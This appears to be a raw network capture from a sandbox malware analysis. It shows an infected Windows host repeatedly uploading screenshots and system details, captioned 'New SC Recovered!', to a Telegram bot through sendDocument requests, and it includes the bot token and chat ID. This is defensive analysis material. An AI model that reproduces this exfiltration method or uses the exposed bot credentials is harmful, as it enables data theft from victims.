9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:30 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:30 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 61 32 64 33 66 63 38 34 34 31 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd6a2d3fc84416--
2025-01-10 15:57:30 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:30 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201795,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524650,"document":{"file_name":"user-642294 2025-03-23 17-07-53.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUQ2eBQ2qATxACGLwTliQ_eFZ4jWMbAAI7HQACuyoJUBKwnO3XP43uAQAHbQADNgQ","file_unique_id":"AQADOx0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUQ2eBQ2qATxACGLwTliQ_eFZ4jWMbAAI7HQACuyoJUBKwnO3XP43uAQAHbQADNgQ","file_unique_id":"AQADOx0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFENngUNqgE8QAhi8E5YkP3hWeI1jGwACOx0AArsqCVASsJzt1z-N7jYE","file_unique_id":"AgADOx0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 03/23/2025 16:57:52\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	50011	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:39 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6f6cb7f3d97c Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:40 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:40 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 36 63 62 37 66 33 64 39 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 36 63 62 37 66 33 64 39 37 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 33 30 2f 32 30 32 35 20 30 39 3a 32 34 3a 34 36 0a 55 73 65 72 Data Ascii: -----------------------------8dd6f6cb7f3d97cContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd6f6cb7f3d97cContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/30/2025 09:24:46User
2025-01-10 15:57:40 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:40 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:40 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:40 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:40 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 66 36 63 62 37 66 33 64 39 37 63 2d 2d 0d 0a Data Ascii: -----------------------------8dd6f6cb7f3d97c--
2025-01-10 15:57:40 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:40 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201796,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524660,"document":{"file_name":"user-642294 2025-03-30 09-24-48.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMURGeBQ3QFjHxEb83Lh-Hwr-9WWqScAAI9HQACuyoJUPJN3XBEwma1AQAHbQADNgQ","file_unique_id":"AQADPR0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMURGeBQ3QFjHxEb83Lh-Hwr-9WWqScAAI9HQACuyoJUPJN3XBEwma1AQAHbQADNgQ","file_unique_id":"AQADPR0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFERngUN0BYx8RG_Ny4fh8K_vVlqknAACPR0AArsqCVDyTd1wRMJmtTYE","file_unique_id":"AgADPR0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 03/30/2025 09:24:46\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	50012	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:52 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0197d79 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:52 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:52 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 31 39 37 64 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 31 39 37 64 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 37 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd3165a0197d79Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3165a0197d79Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/10/2025 10:57:50User
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:57:52 UTC	7668	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:57:52 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 31 39 37 64 37 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd3165a0197d79--
2025-01-10 15:57:52 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:57:52 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201797,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524672,"document":{"file_name":"user-642294 2025-01-10 10-57-50.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMURWeBQ4BUlbh72OTfA2Hr-AkyJxCrAAI-HQACuyoJUJ6DP9G4bzIVAQAHbQADNgQ","file_unique_id":"AQADPh0AArsqCVBy","file_size":10551,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMURWeBQ4BUlbh72OTfA2Hr-AkyJxCrAAI-HQACuyoJUJ6DP9G4bzIVAQAHbQADNgQ","file_unique_id":"AQADPh0AArsqCVBy","file_size":10551,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFEVngUOAVJW4e9jk3wNh6_gJMicQqwACPh0AArsqCVCegz_RuG8yFTYE","file_unique_id":"AgADPh0AArsqCVA","file_size":57184},"caption":"New SC Recovered!\n\nTime: 01/10/2025 10:57:50\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	50013	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:57:52 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3165a0256939 Host: api.telegram.org Content-Length: 57807 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:57:52 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:57:52 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 32 35 36 39 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 36 35 61 30 32 35 36 39 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 30 2f 32 30 32 35 20 31 30 3a 35 37 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd3165a0256939Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3165a0256939Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/10/2025 10:57:50User
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:57:52 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
